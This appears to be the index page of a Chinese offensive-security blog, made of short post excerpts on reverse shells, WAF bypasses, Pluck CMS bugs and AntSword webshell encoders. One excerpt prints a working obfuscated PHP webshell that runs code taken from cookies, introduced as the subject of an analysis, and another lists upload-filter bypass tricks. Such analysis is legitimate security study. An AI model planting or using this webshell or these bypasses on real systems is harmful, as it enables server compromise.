1 前言看hack the box的视频的时候,发现ippsec不喜欢用蚁剑,喜欢弹个shell回来。 然后一顿操作把一个简单的shell就升级到了一个
1 前言 1 2 3 <?php $p=$_COOKIE;(count($p)==23&&in_array(gettype($p).count($p),$p))?(($p[59]=$p[59].$p[72])&&($p[91]=$p[59]($p[91]))&&($p=$p[91]($p[90],$p[59]($p[31])))&&$p()):$p; ?> 星球里有很多同学想让我对这个shell写一篇解析,看了下确实比较有意思,并且顺便也想讲一些自己的想法。 2 语法分析比较复杂的
九世发在星球里的文章,因为比较敏感就放在博客上了。 绕过的方法: 三个点: 1.后缀名回车分割 2.删除Content-Type头 3.垃圾数据填充 1
向吃鸡外挂站开炮(一) 向吃鸡外挂站开炮(二) 1 前言第三篇终于写好了,也算是比较有意思的一篇,遇到了很多坑,也用上了很多小技巧,写出来博君一笑
1 前言模块很早就写好了,今天才有时间把文章写出来 大家都知道填充垃圾数据可以用于SQL注入的绕过,原理就是WAF在遇到大量的GET或者POST
1 前言本来是在cnvd上看到了有人发Pluck CMS的洞,但是没有公开细节,便想着自己挖一下。 但是审完第一个后发现已经有两位同学写出来了 Pluck CMS
1 前言最近研究了一下蚁剑PHP的RSA和AES编码器,发现都是需要开启openssl扩展才可以使用 但是这个模块大多数情况下是不开的,所以就导